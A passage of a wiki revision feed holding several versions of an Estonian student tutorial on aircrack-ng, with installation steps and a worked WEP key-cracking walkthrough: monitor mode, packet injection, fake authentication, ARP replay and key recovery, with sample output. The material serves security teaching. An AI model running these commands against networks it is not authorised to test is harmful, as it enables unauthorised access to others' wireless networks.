 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor(id)=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;         &lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89281</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89281"/>
		<updated>2015-05-25T19:12:49Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit. &lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Üldkirjeldus=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume:&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liidese:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;&#039;airmon-ng stop athX&#039;&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pane tähele! Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav airmon-ng stop ath0 käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raaiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pane tähele! “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli: Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&#039;&#039;&#039;&lt;br /&gt;
Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&lt;br /&gt;
-9 - “süstimise” test&lt;br /&gt;
-e teddy – raadiovõrgu nimi&lt;br /&gt;
-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&lt;br /&gt;
ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pane tähele! Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&lt;br /&gt;
-c 9 – raadiovõrgu kanal&lt;br /&gt;
--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühendud&lt;br /&gt;
-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
-1 – võlts autentimine&lt;br /&gt;
0 – kordusühendus(t)e aeg sekundites&lt;br /&gt;
-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&lt;br /&gt;
output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor(id)=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;         &lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89280</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89280"/>
		<updated>2015-05-25T19:11:55Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit. &lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Üldkirjeldus=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
